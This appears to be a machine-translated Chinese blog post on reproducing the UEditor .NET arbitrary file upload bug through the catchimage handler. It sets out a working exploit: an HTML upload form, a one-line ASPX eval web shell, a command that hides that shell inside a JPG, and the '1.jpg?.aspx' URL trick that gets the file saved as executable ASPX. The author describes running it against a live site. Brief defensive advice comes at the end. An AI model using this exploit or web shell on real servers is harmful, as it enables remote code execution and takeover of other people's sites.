当前位置:网站首页>UEditor . Net version arbitrary file upload vulnerability recurrence
UEditor . Net version arbitrary file upload vulnerability recurrence
2022-07-02 06:55:00 【Xu Jirong】
Catalog
Vulnerability background
Holes affect
Exploit
Vulnerability analysis
Defensive measures
Vulnerability background
UEditor By Baidu WEB WYSIWYG open source rich text editor developed by front end R & D department
Holes affect
Impact of the vulnerability UEditor Of .Net edition , Other language versions are not affected for the time being .
Exploit
First prepare a html Documents are used for post Submit
<form action="http://www.xxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>
action Fill in the website at controller.ashx
The path of
in addition :enctype="application/x-www-form-urlencoded" What do you mean ?
open html After the following
At this time, we need a server to put the image Trojan , Servers can go to Alibaba cloud 、 Huawei cloud and others apply for free
We're going to prepare a 2.jpg
With a pony 3.aspx
, The pony code is as follows
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
use cmd
Command composite picture Trojan horse
copy 2.jpg/b + 3.aspx/a 1.jpg
We upload this trojan horse to our server , Remember the server image path
Prior to shell addr
Fill in the following parameters
http://x.x.x.x/1.jpg?.aspx
http://x.x.x.x/1.jpg
Is the address of our server followed by .aspx
To generate aspx file , The page after submission is as follows
The file path we upload should be as follows
http://www.xxx.com/ueditor/net/upload/2206/2206-63790xxxxxxx0006134716.aspx
But I can't link it , Later I learned that the source code of the server was changed
The path here is guessed by chance , Normally, it should be prefixed
Here it is , So the Trojan path should be
http://www.xxx.com/upload/2206/2206-63790xxxxxxx0006134716.aspx
I found that the server had been invaded , And left the back door , I guess it's the source code changed by the intruder before
Vulnerability analysis
UEditor When capturing remote data sources , Will enter "catchimage" Branch
The cause of the vulnerability is that only ContentType, As a result, any file upload can be bypassed .
java Nah , Unable to analyze the source code , Wait until I finish my study
Defensive measures
1. Modify the project directory net/App_Code/CrawlerHandler.cs file , Add code to check the file type . 2. Use all kinds of WAF Software , Prevent attackers from uploading malicious files . 3. Check whether there are recently uploaded abnormal pictures in the file upload path ; Check for presence asp,aspx And other types of hazardous documents . If you find an exception file , Please delete in time after judgment .边栏推荐
- Latex compilation error I found no \bibstyle &\bibdata &\citation command
- sprintf_ How to use s
- Stack (linear structure)
- Nodejs - Express middleware modification header: typeerror [err_invalid_char]: invalid character in header content
- Uploading attachments using Win32 in Web Automation
- 查询GPU时无进程运行,但是显存却被占用了
- 工具种草福利帖
- A preliminary study on ant group G6
- Functions of tensorrt
- [self cultivation of programmers] - Reflection on job hunting Part II
猜你喜欢
由于不正常断电导致的unexpected inconsistency;RUN fsck MANUALLY问题已解决
unittest. Texttestrunner does not generate TXT test reports
Latex在VSCODE中编译中文,使用中文路径问题解决
SQLI-LABS通关(less18-less20)
Latex 编译报错 I found no \bibstyle & \bibdata & \citation command
如何调试微信内置浏览器应用(企业号、公众号、订阅号)
Sentry搭建和使用
CTF three count
Stack (linear structure)
In depth study of JVM bottom layer (II): hotspot virtual machine object
随机推荐
No process runs when querying GPU, but the video memory is occupied
DeprecationWarning: . ix is deprecated. Please use. loc for label based indexing or. iloc for positi
微信小程序基础
Loops in tensorrt
js判断数组中对象是否存在某个值
Implement strstr() II
ZZQ的博客目录--更新于20210601
[self cultivation of programmers] - Reflection on job hunting Part II
JS divides an array into groups of three
Tool grass welfare post
Pytest (2) mark function
Differences between ts and JS
Log - 7 - record a major error in missing documents (A4 paper)
CTF three count
Huawei mindspire open source internship machine test questions
apt命令报证书错误 Certificate verification failed: The certificate is NOT trusted
Vector types and variables built in CUDA
看完有用的blog
A preliminary study on ant group G6
sqli-labs通关汇总-page3